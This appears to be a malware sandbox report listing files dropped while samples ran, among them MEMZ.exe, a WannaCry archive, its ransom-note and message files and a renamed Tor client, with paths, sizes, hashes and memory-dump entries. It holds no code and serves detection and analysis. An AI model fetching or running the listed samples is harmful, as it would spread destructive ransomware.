23b64ed68a8f1df4d942b5a08a6b6296ec5499a13bb48536e8426d9795771dbcef253be738bf6dc7158a5815f8dcc65feb92fadf89ea8054544bb54fc83aa247

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\AGT20.INF

Filesize
2KB

MD5
e4a499b9e1fe33991dbcfb4e926c8821

SHA1
951d4750b05ea6a63951a7667566467d01cb2d42

SHA256
49e6b848f5a708d161f795157333d7e1c7103455a2f47f50895683ef6a1abe4d

SHA512
a291bb986293197a16f75b2473297286525ac5674c08a92c87b5cc1f0f2e62254ea27d626b30898e7857281bdb502f188c365311c99bda5c2dd76da0c82c554a

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\AGTCTL15.TLB

Filesize
28KB

MD5
f1656b80eaae5e5201dcbfbcd3523691

SHA1
6f93d71c210eb59416e31f12e4cc6a0da48de85b

SHA256
3f8adc1e332dd5c252bbcf92bf6079b38a74d360d94979169206db34e6a24cd2

SHA512
e9c216b9725bd419414155cfdd917f998aa41c463bc46a39e0c025aa030bc02a60c28ac00d03643c24472ffe20b8bbb5447c1a55ff07db3a41d6118b647a0003

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\AGTINST.INF

Filesize
7KB

MD5
b127d9187c6dbb1b948053c7c9a6811f

SHA1
b3073c8cad22c87dd9b8f76b6ffd0c4d0a2010d9

SHA256
bd1295d19d010d4866c9d6d87877913eee69e279d4d089e5756ba285f3424e00

SHA512
88e447dd4db40e852d77016cfd24e09063490456c1426a779d33d8a06124569e26597bb1e46a3a2bbf78d9bffee46402c41f0ceb44970d92c69002880ddc0476

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\MSLWVTTS.DLL

Filesize
52KB

MD5
316999655fef30c52c3854751c663996

SHA1
a7862202c3b075bdeb91c5e04fe5ff71907dae59

SHA256
ea4ca740cd60d2c88280ff8115bf354876478ef27e9e676d8b66601b4e900ba0

SHA512
5555673e9863127749fc240f09cf3fb46e2019b459ad198ba1dc356ba321c41e4295b6b2e2d67079421d7e6d2fb33542b81b0c7dae812fe8e1a87ded044edd44

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Msvcirt.dll

Filesize
76KB

MD5
e7cd26405293ee866fefdd715fc8b5e5

SHA1
6326412d0ea86add8355c76f09dfc5e7942f9c11

SHA256
647f7534aaaedffa93534e4cb9b24bfcf91524828ff0364d88973be58139e255

SHA512
1114c5f275ecebd5be330aa53ba24d2e7d38fc20bb3bdfa1b872288783ea87a7464d2ab032b542989dee6263499e4e93ca378f9a7d2260aebccbba7fe7f53999

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Msvcp50.dll

Filesize
552KB

MD5
497fd4a8f5c4fcdaaac1f761a92a366a

SHA1
81617006e93f8a171b2c47581c1d67fac463dc93

SHA256
91cd76f9fa3b25008decb12c005c194bdf66c8d6526a954de7051bec9aae462a

SHA512
73d11a309d8f1a6624520a0bf56d539cb07adee6d46f2049a86919f5ce3556dc031437f797e3296311fe780a8a11a1a37b4a404de337d009e9ed961f75664a25

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\W95INF16.DLL

Filesize
2KB

MD5
7210d5407a2d2f52e851604666403024

SHA1
242fde2a7c6a3eff245f06813a2e1bdcaa9f16d9

SHA256
337d2fb5252fc532b7bf67476b5979d158ca2ac589e49c6810e2e1afebe296af

SHA512
1755a26fa018429aea00ebcc786bb41b0d6c4d26d56cd3b88d886b0c0773d863094797334e72d770635ed29b98d4c8c7f0ec717a23a22adef705a1ccf46b3f68

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\W95INF32.DLL

Filesize
4KB

MD5
4be7661c89897eaa9b28dae290c3922f

SHA1
4c9d25195093fea7c139167f0c5a40e13f3000f2

SHA256
e5e9f7c8dbd47134815e155ed1c7b261805eda6fddea6fa4ea78e0e4fb4f7fb5

SHA512
2035b0d35a5b72f5ea5d5d0d959e8c36fc7ac37def40fa8653c45a49434cbe5e1c73aaf144cbfbefc5f832e362b63d00fc3157ca8a1627c3c1494c13a308fc7f

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\andmoipa.ttf

Filesize
29KB

MD5
c3e8aeabd1b692a9a6c5246f8dcaa7c9

SHA1
4567ea5044a3cef9cb803210a70866d83535ed31

SHA256
38ae07eeb7909bda291d302848b8fe5f11849cf0d597f0e5b300bfed465aed4e

SHA512
f74218681bd9d526b68876331b22080f30507898b6a6ebdf173490ca84b696f06f4c97f894cb6052e926b1eee4b28264db1ead28f3bc9f627b4569c1ddcd2d3e

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tv_enua.dll

Filesize
1.2MB

MD5
ed98e67fa8cc190aad0757cd620e6b77

SHA1
0317b10cdb8ac080ba2919e2c04058f1b6f2f94d

SHA256
e0beb19c3536561f603474e3d5e3c3dff341745d317bc4d1463e2abf182bb18d

SHA512
ec9c3a71ca9324644d4a2d458e9ba86f90deb9137d0a35793e0932c2aa297877ed7f1ab75729fda96690914e047f1336f100b6809cbc7a33baa1391ed588d7f0

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tv_enua.hlp

Filesize
11KB

MD5
80d09149ca264c93e7d810aac6411d1d

SHA1
96e8ddc1d257097991f9cc9aaf38c77add3d6118

SHA256
382d745e10944b507a8d9c69ae2e4affd4acf045729a19ac143fa8d9613ccb42

SHA512
8813303cd6559e2cc726921838293377e84f9b5902603dac69d93e217ff3153b82b241d51d15808641b5c4fb99613b83912e9deda9d787b4c8ccfbd6afa56bc9

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tv_enua.inf

Filesize
2KB

MD5
0a250bb34cfa851e3dd1804251c93f25

SHA1
c10e47a593c37dbb7226f65ad490ff65d9c73a34

SHA256
85189df1c141ef5d86c93b1142e65bf03db126d12d24e18b93dd4cc9f3e438ae

SHA512
8e056f4aa718221afab91c4307ff87db611faa51149310d990db296f979842d57c0653cb23d53fea54a69c99c4e5087a2eb37daa794ba62e6f08a8da41255795

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tvenuax.dll

Filesize
40KB

MD5
1587bf2e99abeeae856f33bf98d3512e

SHA1
aa0f2a25fa5fc9edb4124e9aa906a52eb787bea9

SHA256
c9106198ecbd3a9cab8c2feff07f16d6bb1adfa19550148fc96076f0f28a37b0

SHA512
43161c65f2838aa0e8a9be5f3f73d4a6c78ad8605a6503aae16147a73f63fe985b17c17aedc3a4d0010d5216e04800d749b2625182acc84b905c344f0409765a

Download Submit
C:\Users\Admin\AppData\Local\Temp\MEMZ.exe

Filesize
417KB

MD5
2bab25d095853edb399bd76192ae8401

SHA1
92c2e1f4349d6a51b57073469165bf5737d4d324

SHA256
9b82e802e0ee12c3455e5c180060e67f6b10f0c54da5cd9514aabfec6ef7d1da

SHA512
4e5cd022a45cb3f8f5c2645f70af3f3e8b3772cd7987d7c547720f094f137dabcb8b364b3c6c929bcfde73b2d8ec34af77c7c17dcad4a2316df39f388e412c40

Download Submit
C:\Users\Admin\AppData\Local\Temp\Untitled.png

Filesize
1KB

MD5
15c70fd854d6aca10d556f32f47800bc

SHA1
e176ed70883fd43dbc6f1843c167c462572b4a94

SHA256
39e22197fc2502f28657508eece1ca989aa147ecc8ca7ab90e7de16465e0dc2e

SHA512
9e61d712be05df288c65128a515b89078b8885150e87cd89ca22229ff90bdc933fe9ead749c8f760bd291e37f4e72a56f31e5fc8a9d8ac906d63b1329dd3c1b0

Download Submit
C:\Users\Admin\AppData\Local\Temp\_is49D3\Setup.INI

Filesize
61KB

MD5
6d205c63a48fb182f30e5a19ca071741

SHA1
14360fe6a233f87a4e380d664231439bd73c33d6

SHA256
d4010488339397e2a52f4b0ce24984cc6b8598ebd43220d4f0509e329f24ae1f

SHA512
d092d085110c3fbca0cb98ed06ce51b2a2e9c92bfac2d751651ea4497c5c45c8866a7d2f6c64145c9c82057cd0590edef51b1234249c227f686659d041168f02

Download Submit
C:\Users\Admin\AppData\Local\Temp\_is49D3\_ISMSIDEL.INI

Filesize
9B

MD5
ed5602cb0540d203f85998db92821f1d

SHA1
6090ee19d2e0d2fc3c65cb0bdf8242abc849ba9d

SHA256
39dc0aa1c73f37aca1528e6b1dbece97e523cd1324e9b577f5dc5e2217197868

SHA512
14fd93c45a129a88defac989f01df8f4a25580b83ad6b5eb5a9d1d28f6a6c68f840b2f6c71ec77558f8d4f35f8fc3f8ddcece19f3b687e40f396b153b4f79746

Download Submit
C:\Users\Admin\AppData\Roaming\tor\cached-microdescs.new

Filesize
5.0MB

MD5
ebc60f3e545a4d0ebb3474f98c4fe238

SHA1
72db90e5558b87a2ac9a69ba0e43d690ecf29988

SHA256
f1645ce22d9bee2d08024f59fb0f5a45d01c81f384fb73caa49d6bc212563aed

SHA512
5231b15cfd74cad9171d3a78899eee7e8c5c3e51a9f6aaac4ad881b1723ad3e7352db989f2b7cec4355aa8c0cf4f6c26893ec071c08ab578b72b55587a068dea

Download Submit
C:\Users\Admin\Desktop\@[email protected]

Filesize
933B

MD5
7e6b6da7c61fcb66f3f30166871def5b

SHA1
00f699cf9bbc0308f6e101283eca15a7c566d4f9

SHA256
4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e

SHA512
e5a56137f325904e0c7de1d0df38745f733652214f0cdb6ef173fa0743a334f95bed274df79469e270c9208e6bdc2e6251ef0cdd81af20fa1897929663e2c7d3

Download Submit
C:\Users\Admin\Desktop\TaskData\Tor\taskhsvc.exe

Filesize
3.0MB

MD5
fe7eb54691ad6e6af77f8a9a0b6de26d

SHA1
53912d33bec3375153b7e4e68b78d66dab62671a

SHA256
e48673680746fbe027e8982f62a83c298d6fb46ad9243de8e79b7e5a24dcd4eb

SHA512
8ac6dc5bb016afc869fcbb713f6a14d3692e866b94f4f1ee83b09a7506a8cb58768bd47e081cf6e97b2dacf9f9a6a8ca240d7d20d0b67dbd33238cc861deae8f

Download Submit
C:\Users\Admin\Desktop\msg\m_finnish.wnry

Filesize
37KB

MD5
35c2f97eea8819b1caebd23fee732d8f

SHA1
e354d1cc43d6a39d9732adea5d3b0f57284255d2

SHA256
1adfee058b98206cb4fbe1a46d3ed62a11e1dee2c7ff521c1eef7c706e6a700e

SHA512
908149a6f5238fcccd86f7c374986d486590a0991ef5243f0cd9e63cc8e208158a9a812665233b09c3a478233d30f21e3d355b94f36b83644795556f147345bf

Download Submit
C:\Users\Admin\Documents\@[email protected]

Filesize
240KB

MD5
7bf2b57f2a205768755c07f238fb32cc

SHA1
45356a9dd616ed7161a3b9192e2f318d0ab5ad10

SHA256
b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25

SHA512
91a39e919296cb5c6eccba710b780519d90035175aa460ec6dbe631324e5e5753bd8d87f395b5481bcd7e1ad623b31a34382d81faae06bef60ec28b49c3122a9

Download Submit
C:\Users\Admin\Downloads\Bonzi.zip

Filesize
49.8MB

MD5
65259c11e1ff8d040f9ec58524a47f02

SHA1
2d5a24f7cadd10140dd6d3dd0dc6d0f02c2d40fd

SHA256
755bd7f1fc6e93c3a69a1125dd74735895bdbac9b7cabad0506195a066bdde42

SHA512
37096eeb1ab0e11466c084a9ce78057e250f856b919cb9ef3920dad29b2bb2292daabbee15c64dc7bc2a48dd930a52a2fb9294943da2c1c3692863cec2bae03d

Download Submit
C:\Users\Admin\Downloads\Glib_Cursor_Pack.rar

Filesize
230KB

MD5
d57b19e9ba1401a2377cfee363f38112

SHA1
8b33f26d65db042f61c3aa2938e467c7cdde8acc

SHA256
d164b6c45ab43043244b85eba41e57b381add13727200c681676d6a1491d3c3e

SHA512
f43338e38257cb8d975d85db856ade7b39740b4edc9a8eaeaea186afa34fb3a78309e872b4e4529926bb4bf7e86dea8f74888dd9889aef43573a50f944af7498

Download Submit
C:\Users\Admin\Downloads\Ransomware.WannaCry.zip

Filesize
3.3MB

MD5
efe76bf09daba2c594d2bc173d9b5cf0

SHA1
ba5de52939cb809eae10fdbb7fac47095a9599a7

SHA256
707a9f323556179571bc832e34fa592066b1d5f2cac4a7426fe163597e3e618a

SHA512
4a1df71925cf2eb49c38f07c6a95bea17752b025f0114c6fd81bc0841c1d1f2965b5dda1469e454b9e8207c2e0dfd3df0959e57166620ccff86eeeb5cf855029

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 751202.crdownload

Filesize
4.1MB

MD5
572f6572105f10b2ca8cfc2c19387187

SHA1
c0c7a70faf3c6cad42eef2eae2ec7c8314403b4e

SHA256
75af27bfaee4d265de29fceadbae80965dd4eb559adf8455ece194554be78cc9

SHA512
457c176bf5076e6bcf62aa89ce3204cd29511c609c12683876e075d40f231b387e838132aaba576ec49644d29f33ea692c690db9e6ba49df8d5cfebafbcc23f7

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 957178.crdownload

Filesize
2.8MB

MD5
1535aa21451192109b86be9bcc7c4345

SHA1
1af211c686c4d4bf0239ed6620358a19691cf88c

SHA256
4641af6a0071e11e13ad3b1cd950e01300542c2b9efb6ae92ffecedde974a4a6

SHA512
1762b29f7b26911a7e6d244454eac7268235e2e0c27cd2ca639b8acdde2528c9ddf202ed59ca3155ee1d6ad3deba559a6eaf4ed74624c68688761e3e404e54da

Download Submit
C:\Users\Public\Desktop\@[email protected]

Filesize
1.4MB

MD5
c17170262312f3be7027bc2ca825bf0c

SHA1
f19eceda82973239a1fdc5826bce7691e5dcb4fb

SHA256
d5e0e8694ddc0548d8e6b87c83d50f4ab85c1debadb106d6a6a794c3e746f4fa

SHA512
c6160fd03ad659c8dd9cf2a83f9fdcd34f2db4f8f27f33c5afd52aced49dfa9ce4909211c221a0479dbbb6e6c985385557c495fc04d3400ff21a0fbbae42ee7c

Download Submit
C:\Users\Public\Desktop\Firefox.lnk

Filesize
1000B

MD5
1d2611c2120dd4d63813719b009316c7

SHA1
feec3fba3b7053ad915d20c7bfe2d26738d2da9c

SHA256
32048803ccdb0512313471c4b07acdffee8ac8d003098199fc4b0519cce1f7a5

SHA512
ac52ce53ed897d710c1f65235f250de1e26ade01700b12d76a97281d83f1701d47e20bf7de7e87b4108cef3a75ec8564b2f494f6ba4d78bce883bbbb3f492a7f

Download Submit
C:\Users\Public\Desktop\Google Chrome.lnk

Filesize
2KB

MD5
a982bc8a8b66511bc9d3e89b62893288

SHA1
5a1f7f96128510da7e1f8acdeb16bdb038014eaf

SHA256
7be616b904d31a956f28f3f5718556cca5fcfc941b2cbb30ad44425e3fb4a9ea

SHA512
6a068b37cb14e292c1482f4b68a049137fd11c4d9fa3a33e7d16806cdd4f04492a261a1ab2f38ef625ca7cc3cf18e97f34fd46242900b208409d9a4f41eea9a8

Download Submit
C:\Users\Public\Desktop\VLC media player.lnk

Filesize
923B

MD5
4d80ea0f44bab7d8b3751e9346036686

SHA1
5ce5f2e4c74b696bff8759b068549a999e52c96b

SHA256
04bdf9dc8b6245b3f12682cb44b180abf534f8054d48546982c0190366c26e9e

SHA512
1cfb51afef2639be9be6f99d1e1c78ebc154a22f8a1a5cf489c00c338be8709aeb27e71528d129765253e6584bcc0c88a882666431731535a3292b82627c41e7

Download Submit
C:\Windows\Cursors\Glib Cursors\Normal Select.cur

Filesize
4KB

MD5
4cb94e21a59ac076762c7f98a02d0b06

SHA1
8d554c6962dc41069cfd07e51b27dd48823872c4

SHA256
fb521e12fb7781bb8fe9dd8d00d386442f9c1796e18379062ba91302b16161fa

SHA512
16aa919431e8f8c8ef23eba54c58ca4092b0d0f76745d3ba64828ddba8acf378ff451a2ecd6df19096e5bf41cf2039d39a5aa2e4f1e40040137df2d1ccfa765e

Download Submit
C:\Windows\Cursors\Glib Cursors\Pecision Select.cur

Filesize
4KB

MD5
6f6653c8b856be96650fc06d0dcef0a1

SHA1
577d9e9c5e900377ec232559db797e2c5e0badd0

SHA256
f7398c2af0bd3a51dd6acff25c4d2fb644dc38d1560ec5ed08ce699539fa843c

SHA512
34f54fc34b1643eb9e390a0463ee5bdf4b5ac522274104637ef4290509229e0745c24cbc91e70e6ef018ef3040ef330a062d8a8fe39b9e73417477b121a206fc

Download Submit
C:\Windows\Cursors\Glib Cursors\SETA32.tmp

Filesize
4KB

MD5
610d7c3b3d17909c70fa5aadf78d8bca

SHA1
59f073c5a5c67089de986411a5ff3dc31ed69d55

SHA256
0f33275195a4ee27d581f4369c324623d89b05a07c10cd2a4baa61390fd213ee

SHA512
12c75ab7e1ee9da309ea383552ecbc0b8ca202facf12ad2fe849595abb97e844f837c09fd5403cde7351ac848a870847c759a0971e7ab0493f90f82e2abfc51d

Download Submit
C:\Windows\Cursors\Glib Cursors\alternate.cur

Filesize
4KB

MD5
7d75086d0b939dd478aaea9e290e6bfc

SHA1
3868598321d8ca23c97909878ff2ca7f41e6cc1b

SHA256
bdf834683162a09cca31ae37660947f74380eae85768db0d52f73498bc0cfb2a

SHA512
f46446592b8fa59b609376417d96c30fab8a78e3cdb6f27c5f18cd9b7c55fcf0d601f401605ffb8ead093fe945cc08c768e09e3979c22ac044e7c0fd0f98e9a0

Download Submit
C:\Windows\Cursors\Glib Cursors\beam.cur

Filesize
8KB

MD5
ec705e6ce2cb307ab062fdb19d469c82

SHA1
d92d557f31e19567209c8b95df3f3133970d7a6c

SHA256
da1a1cc826103a3ea48f398a2ab75e823c4b0da5e07670a1323e4f7572813180

SHA512
7a7d9852a71040857c468f7841dea01300233808b05df25a1e369cc85a79ed457a071f38a31780804d910b3e5414af95350d52eaf2a12626149cdd9ec78cb2ee

Download Submit
C:\Windows\Cursors\Glib Cursors\busy.ani

Filesize
2.3MB

MD5
24b03aafac042bb770a243eb370a8057

SHA1
769a8562ab98de65f8715bdf2322504cf51173ab

SHA256
1d0e521ee9955cd2205ee8918843898b495a625273f98b5149f5a3b7e6e7ee38

SHA512
cbac90d5212c3be52ac24d5991451c2932bddf38d9ff0819afc2fa8ae74b5b0ddf5e4e9455e116dbe39de53531c6f6d317bed0ca312f3099ead1ec2c8afb232b

Download Submit
C:\Windows\Cursors\Glib Cursors\dgn1.cur

Filesize
4KB

MD5
92ce215beb1d2b42ad976f707d8deea6

SHA1
4c8640d9d3f65c3ae10db262d1a30c3d120142b7

SHA256
5a49bca67396f66e6079e98c12c51007d616b8a21d7a6a0e47df577bf6ea540c

SHA512
b5dad97035af8900149bfaab0a519b2811306da8923224b864ae186dce51a2e098607aed203dfce47939f7ef6e3583977af236dafc79671d6fcd27bf8b9db6ea

Download Submit
C:\Windows\Cursors\Glib Cursors\handwriting.cur

Filesize
4KB

MD5
24d1dc31af4f42e61340b1008f918c9b

SHA1
1bde7cf6b18d19eaf81bf139739819983c08f186

SHA256
fd74985bc8615e8636bd435661e598c8ed92a674afee6d70cb05aa7ecc38a513

SHA512
161e1a82954d83998b2c634b7b9e9dab092601de9d361bc4749bf1e10c198a04fb02928954346902594f8e0143d980c5e3706ae924763161b847a9f0c00cb8a0

Download Submit
C:\Windows\Cursors\Glib Cursors\help.cur

Filesize
4KB

MD5
3ebc04ecbf36412b623b84caac7465ab

SHA1
bd444db6be4d98b4ad79c76073c01d58ee525839

SHA256
9c3041c4b07e7bbc2aac2ec56125d6d0000d38c1a5f32dedbadc712b71702cc3

SHA512
8e8581077d4f05257fb6f1fcdff99a8eb904a7ea44c00a13d0777ba82c3238543d7ac87d189f87ddb3d839e76584d383e264880828031d3d7f5f888dd6988c7a

Download Submit
C:\Windows\Cursors\Glib Cursors\horz.cur

Filesize
4KB

MD5
5e5c54318fe6a792753cf96b7340f503

SHA1
5dff477f78bee21651927c913048c079d7fd5e60

SHA256
cc1c5b4dfbbf5cf453b25baedd90e7ba125a6f95df86dfc050bbb7ae0dee398f

SHA512
69bdd381d435c6a02ecc45d19722e71effe844fa83c463fc9a4e5d12a3338ba5c0c4f537120742d9667752e1ff8a1e0411f53782d5cde4cb70a025c1c60317bf

Download Submit
C:\Windows\Cursors\Glib Cursors\link.cur

Filesize
4KB

MD5
0d3f98f1ba2f6a2f8da677a9af269ac9

SHA1
52488d8b490ad7debe876d9eaf779f8efcba3483

SHA256
98ee6573649a51346af167693a98eb6a140e8dad8cecd4fc4ae22d7aff802c3f

SHA512
33859bef379660ed50e91c0a95c47eebe6da7527f977ccbbcf1a76bf4c01ab313b7ab8c2e50de66de2a38b0d7f5a41ecf8be17f155f9447117098aae9b90bc57

Download Submit
C:\Windows\Cursors\Glib Cursors\move.cur

Filesize
4KB

MD5
93334e8ae73b40ac9415f976be52834a

SHA1
d88b5d0d9bcd28019c3d5477c311025aa6d4334f

SHA256
19f0b8495349168e8e432659d1d2ca8d2143f952510c56910538872dfcd342db

SHA512
99fe6c3817cb6842c1c912b677d5ed76c57aa9b4ed5266701078250613485ca54e10d2bfe62c835cd9f6f7e482dfc2604f9bea75d829c64bb57cf976f8f879c9

Download Submit
C:\Windows\Cursors\Glib Cursors\unavailable.cur

Filesize
4KB

MD5
0858d96d9d1fdae2b17c9c550df45a60

SHA1
3756b5655953affd1c2de50ae6404cf192248215

SHA256
7487aa1b231bbfc90f0d1277877473a52551af6bdbacb326823bcdb235f505a2

SHA512
9503e5eb0310f57ac89e0d82fd4b9edca3cdacf600e38ba0121a0a2d99ef3c62783e7a15ebab98a70eb97a9234df105aca25ed5059706aeea48c4f650d2f1fc1

Download Submit
C:\Windows\Cursors\Glib Cursors\vert.cur

Filesize
4KB

MD5
39e7b501f021bde55383444f3999516c

SHA1
a968136e93c71ebadef158181869d348b88dbcdf

SHA256
348566e300130511357939e2f38ca6d55e889005cb42113dd9c0dc5c92262694

SHA512
c1c78f0e1ca99e6ada0a312d2ec0722f08c2c0e6937e44b5c67549202237e445cbe7b491aaaacc6ff1bbbb21bb4e63ebe50615f1a05b552e8e2c5a1383866b31

Download Submit
C:\Windows\Cursors\Glib Cursors\working.ani

Filesize
2.3MB

MD5
36f05a59839c292289a9f88c8b2c14b7

SHA1
669f4e9a3083d37d929c00dadaea4cfa86865147

SHA256
b27ac9a5af4c2518a303c4368ce69e2218b5a32e781942bd5610653c1506a21f

SHA512
1a3bdd5c2d1fcec411ef8c2035b5a5bd57011210f5fe6ad8aba913f245d73801574eeb77f35061e6de4a0082acef44018cce3cac2823eaeccac850724156402a

Download Submit
C:\Windows\Installer\e5ec573.msi

Filesize
1.1MB

MD5
c4a5049738644e2653ba3c1cdfb0a906

SHA1
08e3b1ee6f015a6670ec75cc805d73fd787e8cf4

SHA256
6770662bc9e8cd39eb31cbe95ee14d6221073d614a79ca6a4fff9d04a07c4949

SHA512
dceac24344da6926435063bb805c7b15e980f2bc9bd02baa796025d1fed40d4cc3b7ba49f098588d76011f221bd711f473d215a2d44b304bceb02ab1bd89474b

Download Submit
C:\Windows\msagent\chars\Bonzi.acs

Filesize
5.0MB

MD5
1fd2907e2c74c9a908e2af5f948006b5

SHA1
a390e9133bfd0d55ffda07d4714af538b6d50d3d

SHA256
f3d4425238b5f68b4d41ed5be271d2f4118a245baf808a62dc1a9e6e619b2f95

SHA512
8eede3e5e52209b8703706a3e3e63230ba01975348dcdc94ef87f91d7c833a505b177139683ca7a22d8082e72e961e823bc3ad1a84ab9c371f5111f530807171

Download Submit
C:\Windows\msagent\chars\Peedy.acs

Filesize
4.0MB

MD5
49654a47fadfd39414ddc654da7e3879

SHA1
9248c10cef8b54a1d8665dfc6067253b507b73ad

SHA256
b8112187525051bfade06cb678390d52c79555c960202cc5bbf5901fbc0853c5

SHA512
fa9cab60fadd13118bf8cb2005d186eb8fa43707cb983267a314116129371d1400b95d03fbf14dfdaba8266950a90224192e40555d910cf8a3afa4aaf4a8a32f

Download Submit
memory/2872-1707-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2872-2530-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2872-1856-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2872-2897-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/3620-3268-0x0000000000400000-0x000000000070B000-memory.dmp

Filesize
3.0MB

Download
memory/3620-3147-0x0000000000400000-0x000000000070B000-memory.dmp

Filesize
3.0MB

Download
memory/3620-3341-0x0000000000400000-0x000000000070B000-memory.dmp

Filesize
3.0MB

Download
memory/3620-3263-0x0000000000400000-0x000000000070B000-memory.dmp

Filesize
3.0MB

Download
memory/3620-3267-0x0000000000400000-0x000000000070B000-memory.dmp

Filesize
3.0MB

Download
memory/3620-3256-0x0000000000400000-0x000000000070B000-memory.dmp

Filesize
3.0MB

Download
memory/3620-3120-0x0000000000400000-0x000000000070B000-memory.dmp

Filesize
3.0MB

Download
memory/3620-3277-0x0000000000400000-0x000000000070B000-memory.dmp

Filesize
3.0MB

Download
memory/3620-3278-0x0000000000400000-0x000000000070B000-memory.dmp

Filesize
3.0MB

Download
memory/3620-3342-0x0000000000400000-0x000000000070B000-memory.dmp

Filesize
3.0MB

Download
memory/3620-3343-0x0000000000400000-0x000000000070B000-memory.dmp

Filesize
3.0MB

Download
memory/3620-3262-0x0000000000400000-0x000000000070B000-memory.dmp

Filesize
3.0MB

Download
memory/4788-1693-0x0000000000400000-0x00000000004BC000-memory.dmp

Filesize
752KB

Download
memory/4788-2676-0x0000000000400000-0x00000000004BC000-memory.dmp

Filesize
752KB

Download
memory/4788-2902-0x0000000000400000-0x00000000004BC000-memory.dmp

Filesize
752KB

Download
memory/4788-1619-0x0000000000400000-0x00000000004BC000-memory.dmp

Filesize
752KB

Download
memory/4788-1855-0x0000000000400000-0x00000000004BC000-memory.dmp

Filesize
752KB

Download
memory/4788-2538-0x0000000000400000-0x00000000004BC000-memory.dmp

Filesize
752KB

Download
memory/5608-2904-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/5608-1598-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/5608-1618-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/5884-3817-0x00000000002D0000-0x0000000000367000-memory.dmp

Filesize
604KB

Download
memory/5884-4840-0x00000000002D0000-0x0000000000367000-memory.dmp

Filesize
604KB

Download
memory/5884-6642-0x00000000002D0000-0x0000000000367000-memory.dmp

Filesize
604KB

Download
memory/6308-3350-0x0000023478530000-0x0000023478531000-memory.dmp

Filesize
4KB

Download
memory/6308-3344-0x0000023478530000-0x0000023478531000-memory.dmp

Filesize
4KB

Download
memory/6308-3345-0x0000023478530000-0x0000023478531000-memory.dmp

Filesize
4KB

Download
memory/6308-3346-0x0000023478530000-0x0000023478531000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

Errors

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads